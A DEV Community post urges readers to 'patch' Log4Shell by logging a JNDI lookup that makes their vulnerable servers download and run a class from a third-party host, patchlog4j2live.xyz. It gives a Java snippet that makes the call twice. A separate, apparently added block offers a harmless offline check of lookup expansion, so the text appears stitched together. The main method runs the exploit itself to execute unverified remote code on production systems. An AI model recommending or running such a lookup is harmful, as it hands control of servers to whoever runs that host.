DEV Community

Nitin Bansal

Use this to automatically patch running log4j2 vulnerability... no need to restart the server

Log the following message to patch your server live against the Log4j2 RCE (CVE-2021-44228):

logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");

This automatically patches your running log4j instance and removes remote lookups, which neutralizes the RCE (CVE-2021-44228).

You can verify it with the following code (obviously, test against a vulnerable version of log4j 🤷‍♂️):

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        // This first lookup reaches the server and downloads the class that patches the live log4j instance
        logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");

        // The RCE should no longer work. If you still see a message printed
        // such as "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS", the patch did not work.
        // Raise an issue here: https://github.com/freakynit/Logout4Shell
        // or here (original version): https://github.com/Cybereason/Logout4Shell
        logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");
    }
}
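The check above only tells you something if the remote class load succeeds. As an added example (not code from the post or from Logout4Shell), here is an offline way to confirm the outcome without sending any traffic to the third-party host: it attaches a temporary in-memory appender to the root logger, logs the harmless, network-free `${java:version}` lookup, and reports whether the running log4j-core still substitutes lookups inside log messages. It assumes log4j-core 2.x (2.11 or later, for the builder API) is the active logging implementation; the class and appender names are my own.

```java
import java.io.StringWriter;

import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.core.LoggerContext;
import org.apache.logging.log4j.core.appender.WriterAppender;
import org.apache.logging.log4j.core.config.Configuration;
import org.apache.logging.log4j.core.layout.PatternLayout;

/** Offline check: does the running log4j-core still expand ${...} lookups in log messages? */
public class LookupCheck {

    // A harmless probe: JavaLookup resolves it locally, no JNDI and no network involved.
    private static final String PROBE = "${java:version}";

    /** Returns true if message lookups are still expanded, i.e. the mitigation is NOT in effect. */
    public static boolean lookupsStillExpanded() {
        // Assumes log4j-core is the binding, so the context is the core LoggerContext.
        LoggerContext ctx = (LoggerContext) LogManager.getContext(false);
        Configuration cfg = ctx.getConfiguration();

        // Temporary appender that captures exactly what the layout produces for the message.
        StringWriter captured = new StringWriter();
        WriterAppender probeAppender = WriterAppender.newBuilder()
                .setName("lookup-probe")
                .setTarget(captured)
                .setLayout(PatternLayout.newBuilder().withPattern("%m%n").build())
                .build();
        probeAppender.start();
        cfg.addAppender(probeAppender);
        cfg.getRootLogger().addAppender(probeAppender, Level.ERROR, null);
        ctx.updateLoggers();
        try {
            LogManager.getRootLogger().error(PROBE);
        } finally {
            // Always detach the probe so it does not linger in the live configuration.
            cfg.getRootLogger().removeAppender("lookup-probe");
            ctx.updateLoggers();
            probeAppender.stop();
        }
        // A mitigated instance writes the literal placeholder; a vulnerable one substitutes it.
        return !captured.toString().contains(PROBE);
    }

    public static void main(String[] args) {
        System.out.println(lookupsStillExpanded()
                ? "VULNERABLE: message lookups are still expanded"
                : "OK: message lookups are not expanded");
    }
}
```

Run it once before and once after the live patch: the result should flip from VULNERABLE to OK without a restart.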

This is based on the awesome Logout4Shell codebase by Cybereason: https://github.com/Cybereason/Logout4Shell

Safe logging...

Disclaimer: I will not be liable for anything good, or bad, happening from using the above. This is solely for a quick resolution.
